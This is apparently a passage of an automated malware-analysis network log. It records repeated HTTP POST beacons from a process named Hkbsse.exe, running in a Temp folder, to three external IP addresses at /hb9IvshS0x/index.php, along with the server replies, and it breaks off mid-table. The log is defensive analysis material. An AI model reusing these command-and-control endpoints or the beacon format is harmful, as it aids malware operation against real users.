91	192.168.2.6	52305	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:09.942229033 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:20:10.610097885 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:20:10.610773087 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:20:10.847827911 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.6	52306	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:10.582226992 CEST	159	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.6	52307	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:10.957649946 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.6	52308	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:11.645230055 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:20:12.345043898 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.6	52309	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:11.645231962 CEST	317	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.6	52310	89.23.103.42	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:11.754175901 CEST	156	OUT	POST /hb9IvshS02/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 89.23.103.42 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.6	52311	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:12.459136009 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:20:13.155352116 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:20:13.156236887 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:20:13.396797895 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.6	52313	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:13.381045103 CEST	159	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.6	52314	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:13.504163980 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:20:14.354795933 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:20:14.355638981 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:20:14.634638071 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.6	52315	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:14.754383087 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:20:15.524769068 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:20:15.525609970 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.6	52316	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:14.992137909 CEST	317	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.6	52317	89.23.103.42	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:15.696160078 CEST	314	OUT	POST /hb9IvshS02/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 89.23.103.42 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.6	52318	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:15.959903955 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:20:16.779968977 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:20:16.780790091 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:20:17.107415915 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.6	52319	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:15.960056067 CEST	159	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.6	52320	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:17.224436045 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:20:18.113651037 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:20:18.114449978 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:20:18.353943110 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.6	52321	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:17.555797100 CEST	317	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.6	52322	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:18.473582983 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:20:19.161710024 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:20:19.162621021 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:20:19.450040102 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.6	52323	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:19.285074949 CEST	159	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.6	52324	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:19.566577911 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.6	52325	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:19.735842943 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:20:20.434163094 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:20:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.6	52326	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:20:19.735961914 CEST	317	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.6	52327	89.23.103.42	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
